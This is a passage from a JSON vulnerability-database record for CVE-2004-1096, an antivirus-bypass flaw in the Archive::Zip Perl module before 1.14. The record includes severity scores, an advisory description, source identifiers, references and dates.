"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2004-1096",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-9526",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2004-1096",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#492545",
"trust": 0.8,
"value": "3.59"
},
{
"author": "CNNVD",
"id": "CNNVD-200501-061",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-9526",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Archive::Zip Perl module before 1.14, when used by antivirus programs such as amavisd-new, allows remote attackers to bypass antivirus protection via a compressed file with both local and global headers set to zero, which does not prevent the compressed file from being opened on a target system. Archive::Zip does not properly parse Zip files and may incorrectly interpret malformed zip archives to contain zero length/size files. As a a result, anti-virus software using Archive::Zip may fail to detect malicious content within a Zip archive. Archive::Zip is a free perl module for working with zip compressed files. Archive::Zip versions prior to 1.14 have security bypass vulnerabilities when used in antivirus programs",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-1096"
},
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
}
],
"trust": 1.71
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-9526",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-9526"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#492545",
"trust": 2.5
},
{
"db": "SECUNIA",
"id": "13038",
"trust": 1.7
},
{
"db": "BID",
"id": "11448",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2004-1096",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "629",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-9526",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"id": "VAR-200501-0243",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-9526"
}
],
"trust": 0.725
},
"last_update_date": "2025-04-03T22:21:48.701000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Archive::Zip AntiVirus Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=146865"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/11448"
},
{
"trust": 1.7,
"url": "http://www.kb.cert.org/vuls/id/492545"
},
{
"trust": 1.7,
"url": "http://www.gentoo.org/security/en/glsa/glsa-200410-31.xml"
},
{
"trust": 1.7,
"url": "http://www.mandriva.com/security/advisories?name=mdksa-2004:118"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/13038/"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17761"
},
{
"trust": 1.6,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026type=vulnerabilities\u0026flashstatus=true"
},
{
"trust": 0.8,
"url": "http://www.linuxsecurity.com/advisories/gentoo_advisory-5043.html"
},
{
"trust": 0.8,
"url": "http://rt.cpan.org/noauth/bug.html?id=8077"
},
{
"trust": 0.8,
"url": "http://www.idefense.com/application/poi/display?id=153"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=153\u0026amp;type=vulnerabilities\u0026amp;flashstatus=true"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#492545"
},
{
"db": "VULHUB",
"id": "VHN-9526"
},
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
},
{
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-11-12T00:00:00",
"db": "CERT/CC",
"id": "VU#492545"
},
{
"date": "2005-01-10T00:00:00",
"db": "VULHUB",
"id": "VHN-9526"
},
{
"date": "2005-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-061"
},
{
"date": "2005-01-10T05:00:00",
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-11-15T00:00:00",
"db": "CERT/CC",
"id": "VU#492545"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-9526"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200501-061"
},
{
"date": "2025-04-03T01:03:51.193000",
"db": "NVD",
"id": "CVE-2004-1096"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Archive::Zip may not properly parse the file sizes of Zip archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#492545"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200501-061"
}
],
"trust": 0.6
}
}